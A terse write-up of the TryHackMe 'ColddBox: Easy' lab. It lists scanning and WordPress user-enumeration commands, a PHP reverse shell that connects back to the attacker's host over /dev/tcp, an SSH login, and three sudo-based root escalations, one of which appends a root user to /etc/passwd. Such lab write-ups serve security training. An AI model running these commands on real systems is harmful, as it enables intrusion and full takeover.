ColddBox: Easy

Room Link: https://tryhackme.com/room/colddboxeasy

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

port 4512 found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

wpscan --url http://$VICTIM/ --enumerate u

Username: c0ldd
Password:  9876543210

Reverse Shell

revshell code

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>

Kali

nc -lvnp 443

Then just go to a page that doesn't exist, in this case p=1 existed but p=2 did not.

Victim

cat /var/www/html/wpconfig.php

TCP/4512 - SSH

Victim

ssh c0ldd@$VICTIM -p 4512
Password: cybersecurity

Privilege Escalation Option 1 - VIM

Victim

sudo -l
sudo vim -c ':!/bin/sh'

Privilege Escalation Option 2 - FTP

Victim

sudo ftp
!/bin/sh

Privilege Escalation Option 3 - chmod

Victim

ls -lah /etc/passwd
LFILE=/etc/passwd
sudo chmod 6777 $LFILE
ls -lah /etc/passwd
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd

Victim

su new
Password: 123